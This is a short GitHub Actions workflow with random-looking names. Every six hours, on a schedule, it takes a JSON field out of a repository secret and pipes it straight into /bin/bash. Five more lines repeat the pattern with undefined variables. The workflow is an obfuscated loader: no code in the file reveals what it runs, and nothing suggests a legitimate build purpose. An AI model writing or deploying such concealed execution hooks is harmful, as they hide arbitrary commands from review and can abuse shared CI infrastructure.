name: liaifangxin1985
on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liaifangxin1985
        env:
          gxq6712: ${{ secrets.gxq6712 }}
        run: |
          echo $gxq6712 | jq -r .wvtgy618 | /bin/bash
          echo $o211 | jq -r .he54 | /bin/bash
          echo $y52427 | jq -r .x88 | /bin/bash
          echo $uhdq990 | jq -r .oun236 | /bin/bash
          echo $fwp317 | jq -r .gqrzc2540 | /bin/bash
          echo $alk48 | jq -r .vpiy91377 | /bin/bash

